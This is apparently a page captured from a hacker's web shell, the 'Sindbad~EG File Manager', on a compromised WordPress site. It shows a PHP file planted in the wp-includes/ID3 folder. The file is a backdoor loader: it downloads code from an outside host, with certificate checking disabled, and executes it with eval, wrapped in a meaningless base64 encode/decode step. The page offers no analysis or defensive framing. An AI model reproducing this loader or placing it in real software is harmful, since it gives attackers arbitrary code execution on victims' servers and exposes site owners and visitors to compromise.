Sindbad~EG File Manager

Current Path : /home/agencxt/www/hajj2025/wp-includes/ID3/
Upload File :
Current File : /home/agencxt/www/hajj2025/wp-includes/ID3/v6.php

<?php
$url = 'https://stepmomhub.com/2.txt';
$content = @file_get_contents($url);

if ($content === false) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $content = curl_exec($ch);
    curl_close($ch);
}

if ($content) {
    $code = base64_encode($content);
    eval('?>' . base64_decode($code));

} ?>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists